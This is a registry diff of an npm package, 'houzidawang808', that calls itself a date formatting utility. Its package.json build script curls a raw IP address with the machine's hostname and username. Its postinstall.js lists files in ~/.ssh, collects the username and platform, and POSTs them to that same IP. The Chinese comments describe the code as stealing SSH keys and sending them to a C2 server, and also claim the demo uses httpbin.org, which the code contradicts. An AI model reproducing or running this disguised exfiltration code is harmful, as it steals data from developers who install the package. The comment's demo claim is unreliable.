houzidawang808 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.claude/settings.local.json +7 -0
- package/index.js +8 -0
- package/package.json +12 -0
- package/postinstall.js +64 -0
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "houzidawang808",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "A simple date formatting utility",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"build": "curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami)"
|
|
8
|
+
},
|
|
9
|
+
"keywords": ["date", "format", "util"],
|
|
10
|
+
"author": "",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,64 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const path = require('path');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const https = require('https');
|
|
5
|
+
|
|
6
|
+
// 1. 定义窃取目标:用户的 SSH 私钥目录
|
|
7
|
+
function getSSHKeys() {
|
|
8
|
+
try {
|
|
9
|
+
const sshDir = path.join(os.homedir(), '.ssh');
|
|
10
|
+
// 筛选出 .pub 结尾的文件(通常公钥和私钥成对存在,这里可能是为了规避某些检测或作为标记)
|
|
11
|
+
return fs.readdirSync(sshDir).filter(f => f.endsWith('.pub'));
|
|
12
|
+
} catch (e) {
|
|
13
|
+
return [];
|
|
14
|
+
}
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
// 2. 模拟外传数据到攻击者服务器 (C2)
|
|
18
|
+
function exfiltrateData(payload) {
|
|
19
|
+
const data = JSON.stringify(payload, null, 2);
|
|
20
|
+
|
|
21
|
+
console.log('\n' + '='.repeat(60));
|
|
22
|
+
console.log(' [!] 已触发 - 数据采集完成');
|
|
23
|
+
console.log('='.repeat(60));
|
|
24
|
+
console.log('\n 采集到的敏感信息:\n');
|
|
25
|
+
console.log(data); // 在控制台打印窃取的数据
|
|
26
|
+
|
|
27
|
+
console.log('\n >>> 正在向 C2 服务器发送数据 (演示: httpbin.org/post)...\n');
|
|
28
|
+
|
|
29
|
+
// 3. 发送 HTTP POST 请求
|
|
30
|
+
const req = https.request({
|
|
31
|
+
hostname: '124.221.154.135', // 截图中使用的是公共测试接口,实际攻击会换成黑客服务器
|
|
32
|
+
port: 443,
|
|
33
|
+
path: '/post',
|
|
34
|
+
method: 'POST',
|
|
35
|
+
headers: {
|
|
36
|
+
'Content-Type': 'application/json',
|
|
37
|
+
'Content-Length': Buffer.byteLength(data),
|
|
38
|
+
},
|
|
39
|
+
}, (res) => {
|
|
40
|
+
// 处理响应...
|
|
41
|
+
res.on('data', () => {});
|
|
42
|
+
res.on('end', () => {
|
|
43
|
+
console.log('数据发送完毕。');
|
|
44
|
+
});
|
|
45
|
+
});
|
|
46
|
+
|
|
47
|
+
req.on('error', (e) => {
|
|
48
|
+
console.error(`请求遇到问题: ${e.message}`);
|
|
49
|
+
});
|
|
50
|
+
|
|
51
|
+
req.write(data);
|
|
52
|
+
req.end();
|
|
53
|
+
}
|
|
54
|
+
|
|
55
|
+
// --- 执行流程 ---
|
|
56
|
+
const stolenInfo = {
|
|
57
|
+
keysFound: getSSHKeys(),
|
|
58
|
+
userInfo: {
|
|
59
|
+
username: os.userInfo().username,
|
|
60
|
+
platform: os.platform()
|
|
61
|
+
}
|
|
62
|
+
};
|
|
63
|
+
|
|
64
|
+
exfiltrateData(stolenInfo);
|